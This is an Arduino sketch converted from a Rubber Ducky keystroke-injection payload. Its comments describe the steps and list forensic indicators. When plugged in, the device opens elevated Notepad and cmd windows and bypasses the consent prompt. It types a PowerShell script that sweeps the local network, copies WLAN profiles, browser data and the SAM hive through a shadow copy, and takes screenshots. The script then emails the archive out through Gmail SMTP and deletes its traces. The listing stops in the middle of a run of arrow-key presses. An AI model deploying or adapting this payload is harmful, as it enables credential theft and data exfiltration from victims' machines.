- /* Converted by Duckuino:
- * https://forums.hak5.org/index.php?/topic/32719-payload-converter-duckuino-duckyscript-to-arduino/?p=244590
- * Enjoy!
- */
- // setup(): runs once when the board enumerates as a USB keyboard and replays a fixed
- // keystroke script against whatever window has focus on the host.
- //
- // What the keystrokes do, as far as this listing shows:
- //   1. Open the Run dialog and start an elevated Notepad.
- //   2. Type a PowerShell script into it line by line and save it as
- //      C:\Windows\config-6fee6.ps1.
- //   3. Open an elevated cmd window, shrink it and send a long run of arrow keys.
- // The typed script inventories the host, probes the local network, copies WLAN profiles,
- // browser profile data and the SAM hive, zips the results to C:\Windows\Report.zip and
- // mails the archive through smtp.gmail.com:587 before deleting its working files.
- //
- // NOTE(review): no keystroke visible in this function starts the saved .ps1 file.
- //
- // Host artifacts named in the typed text that a responder can search for:
- //   - "%USERPROFILE%\Ducky Report <d-M-y HHmmss>" directory with ComputerInfo.html
- //   - C:\Windows\config-6fee6.ps1, C:\Windows\Report.zip, C:\shadowcopy (symlink)
- //   - Win32_ShadowCopy creation, reads of ...\System32\config\SAM through the link
- //   - outbound SMTP submission (TCP 587) from PowerShell
- // The injection is blind: every step relies on fixed 750 ms delays and on focus staying
- // where the script expects it, so partial or mistyped artifacts are likely on a real host.
- void setup() {
- Keyboard.begin();
- delay(750);
- // GUI+r: opens the Windows Run dialog.
- type(KEY_LEFT_GUI,false);
- type('r',false);
- Keyboard.releaseAll();
- delay(750);
- // "-Verb runAs" requests elevation, so a UAC prompt is expected here.
- print(F("powershell Start-Process notepad -Verb runAs"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- delay(750);
- // Alt+y: presumably answers "Yes" on the consent dialog (depends on UI language and on
- // the account being an administrator) - TODO confirm.
- type(KEY_LEFT_ALT,false);
- type('y',false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Alt, then "m", then 51 x Down, then Enter. NOTE(review): looks like an attempt to move
- // the window downwards out of view via the window menu; cannot be confirmed from here.
- type(KEY_LEFT_ALT,false);
- Keyboard.releaseAll();
- delay(750);
- print(F("m"));
- delay(750);
- for(int i = 0; i < 51; i++) {
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- }
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // ---- From here on, each print() types one line of the PowerShell script. ----
- // Working directory: "<userprofile>\Ducky Report <timestamp>".
- print(F("$folderDateTime = (get-date).ToString('d-M-y HHmmss')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$userDir = (Get-ChildItem env:\\userprofile).value + '\\Ducky Report ' + $folderDateTime"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$fileSaveDir = New-Item ($userDir) -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$date = get-date"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // HTML/CSS scaffolding for the report file ComputerInfo.html.
- print(F("$style = \"<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report +\"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Host inventory through WMI: OS, boot time, serial numbers, model, disk, RAM, CPU, GPU.
- print(F("$SysBootTime = Get-WmiObject Win32_OperatingSystem"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SerialNo = $SysSerialNo.SerialNumber"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysManufacturer = $SysInfo.Manufacturer"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysModel = $SysInfo.Model"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$disk = Get-WmiObject Win32_LogicalDisk -Filter \"DeviceID='C:'\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$HD = [math]::truncate($disk.Size / 1GB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysCpu = Get-WmiObject Win32_Processor | Select Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Cpu = $SysCpu.Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$HardSerialNo = $HardSerial.SerialNumber"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$graphicsCard = gwmi win32_VideoController |select Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$graphics = $graphicsCard.Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$DriveLetter = $CDDrive.Drive"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$DriveName = $CDDrive.Caption"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Disk = $DriveLetter + '' + $DriveName"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Firewall state of the current profile, read through the HNetCfg.FwMgr COM object.
- print(F("$Firewall = New-Object -com HNetCfg.FwMgr"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$FireProfile = $Firewall.LocalPolicy.CurrentProfile"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$FireProfile = $FireProfile.FirewallEnabled"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + \"<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Current account: type, SID, password-required flag, and membership of Administrators.
- print(F("$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserType = $UserInfo.AccountType"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserSid = $UserInfo.SID"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserPass = $UserInfo.PasswordRequired"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report +\"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Volume listing (reported under the heading "USB Devices"; the query is win32_volume).
- print(F(" $u = 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("do {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + \"<tr><td>Drive Name: </td><td> + \" $allUsb[$u].Name + $allUsb[$u].Label + \"</td><td>Free Space: </td><td>\" + $gbUSB + \"GB</td></tr>STRING Write-Output $fullUSB\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$u ++"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("} while ($u -lt $allUsb.Count)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Shares, installed software (Win32_Product) and installed hotfixes.
- print(F("$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3> Installed Programs</h3> '"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3> Installed Updates</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Recursive listing of document/archive files; the search root is $userDir, which the
- // lines above set to the report directory itself.
- print(F("$Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // IP-enabled adapters: description, DNS host name, IP and MAC addresses.
- print(F("$Report = $Report + '<div id=center><h3>Network Information</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Network probing: takes the first three octets of the first adapter address, sends ICMP
- // echo to .1-.255, then issues remote WMI queries against every address that answered.
- // On the wire this shows up as a burst of pings followed by DCOM/WMI connection attempts
- // from one workstation to its neighbours.
- print(F("$IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPAddr = $IP.IPAddress | Select-Object -Index 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPAddr -as [String]"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPa = $IPAddr.Split('.') | Select -Index 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPb = $IPAddr.Split('.') | Select -Index 1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPc = $IPAddr.Split('.') | Select -Index 2"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Ping = new-object System.Net.Networkinformation.Ping"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x = 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("do {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPResults = $ScanResults | Select-Object -Index $x"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CurrIP = $IPResults.Address.IPAddressToString"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CurrOS = $CompInfo.SystemDirectory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CurrName = $CompInfo.RegisteredUser"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("if ($CompInfo -ne $null){"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("}else{"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x ++"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("} while ($x -lt $ScanResults.Count)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // TCP connect check of the local machine ($env:COMPUTERNAME) against a fixed port list.
- print(F("$Computer = $env:COMPUTERNAME"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("foreach ($PortNumber in $PortList) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$PortCheck = New-Object Net.Sockets.TcpClient"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$PortCheck.Connect($Computer, $PortNumber)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("if ($PortCheck.Connected) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Credential-bearing data: recursive copy of the Wlansvc profile store into the report
- // directory. Reads of this path by PowerShell are worth alerting on.
- print(F("$wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Copy-Item $srcDir $wlanSaveDir -Recurse"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Screen capture loop: one JPEG per iteration, 60 iterations with a 60 s sleep each, saved
- // under "<report dir>/Screenshots". The bitmap is created at a fixed 1366x768.
- print(F("$jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$displayWidth = $displayInfo.ScreenWidth"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$displayHeight = $displayInfo.ScreenHeight"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("[System.Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\")"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x = 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("do { Start-Sleep -Seconds 60"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$jpegName = (get-date).ToString('HHmmss')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$image = new-object System.Drawing.Bitmap 1366 ,768"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$screen = [System.Drawing.Graphics]::FromImage($image)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$image.Save(\"$jpegSaveDir/$jpegName.jpeg\",([system.drawing.imaging.imageformat]::jpeg));"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x++ } while ($x -ne 60);"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Browser profile copy. $fireDir is built from $userDir, i.e. from the report directory
- // path set earlier, not from the user profile root.
- print(F(" $fireSaveDir = New-Item $userDir'\\Duck\\FireFox-Profile' -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$fireDir = $userDir + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$getFire = Get-Item -Path $fireDir -Exclude extensions"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Copy-Item $getFire $fireSaveDir -Recurse"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Start-Sleep -s 10"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // SAM hive access: creates a volume shadow copy of C:\, links it at C:\shadowcopy, copies
- // Windows\System32\config\SAM into the report directory and removes the link. Shadow-copy
- // creation outside backup windows and the mklink to a shadow device are strong signals.
- print(F("$createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\\', 'ClientAccessible')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$addSlash = $shadow.DeviceObject + ''"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("cmd /c mklink C:\\shadowcopy $addSlash"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Copy-Item 'C:\\shadowcopy\\Windows\\System32\\config\\SAM' $fileSaveDir"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Remove-Item -recurse -force 'C:\\shadowcopy'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Appends the accumulated HTML to ComputerInfo.html.
- print(F("$Report >> $fileSaveDir'/ComputerInfo.html'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Staging: packs the report directory into C:\Windows\Report.zip using shell.application.
- print(F("function copy-ToZip($fileSaveDir){"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$srcdir = $fileSaveDir"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$zipFile = 'C:\\Windows\\Report.zip'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("if(-not (test-path($zipFile))) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("set-content $zipFile (\"PK\" + [char]5 + [char]6 + (\"$([char]0)\" * 18))"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("(dir $zipFile).IsReadOnly = $false}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$shellApplication = new-object -com shell.application"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$zipPackage = $shellApplication.NameSpace($zipFile)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$files = Get-ChildItem -Path $srcdir"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("foreach($file in $files) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$zipPackage.CopyHere($file.FullName)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("while($zipPackage.Items().Item($file.name) -eq $null){"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Start-sleep -seconds 1 }}}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("copy-ToZip($fileSaveDir)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Exfiltration: mails the archive as an attachment via smtp.gmail.com on port 587 with
- // SSL enabled. Account name and password are literal strings in the typed script, so a
- // recovered copy of the .ps1 exposes them. Egress control on SMTP submission from
- // workstations blocks this channel.
- print(F("$SMTPServer = 'smtp.gmail.com'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo.EnableSsl = $true"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential'mail', 'psswd');"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail = New-Object System.Net.Mail.MailMessage"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.From = 'tim241@ziggo.nl'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.To.Add('tim241@ziggo.nl')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.Subject = 'Duck Toolkit Recon Report'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.Body = 'Please find attached your reconnaissance report.'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.Attachments.Add('C:\\Windows\\Report.zip')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo.Send($ReportEmail)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Cleanup: deletes the report directory, the zip and the invoked script. Forensic
- // recovery therefore leans on logs (PowerShell script-block/module logging, process
- // creation, VSS events) rather than on the files themselves.
- print(F("remove-item $fileSaveDir -recurse"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("remove-item 'C:\\Windows\\Report.zip'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Remove-Item $MyINvocation.InvocationName"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // ---- End of typed script text. Ctrl+S, then the target path, saves the buffer. ----
- type(KEY_LEFT_CTRL,false);
- type('S',false);
- Keyboard.releaseAll();
- delay( 750);
- print(F("C:\\Windows\\config-6fee6.ps1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- delay(750);
- // Alt+F: opens the File menu of the focused window; nothing further is selected from it
- // before the next GUI+r.
- type(KEY_LEFT_ALT,false);
- type('F',false);
- Keyboard.releaseAll();
- delay(750);
- // Second Run dialog: elevated cmd, again followed by Alt+y for the consent prompt.
- type(KEY_LEFT_GUI,false);
- type('r',false);
- Keyboard.releaseAll();
- delay(750);
- print(F("powershell Start-Process cmd -Verb runAs"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_LEFT_ALT,false);
- type('y',false);
- Keyboard.releaseAll();
- delay(750);
- // Shrinks the console to 14 columns by 1 line.
- print(F("mode con:cols=14 lines=1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- // Alt, "m", then 48 individual Down presses plus a loop of 70 more. NOTE(review): same
- // window-move pattern as above, presumably to push the console out of view - unconfirmed.
- type(KEY_LEFT_ALT,false);
- Keyboard.releaseAll();
- delay(750);
- print(F("m"));
- delay(750);
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
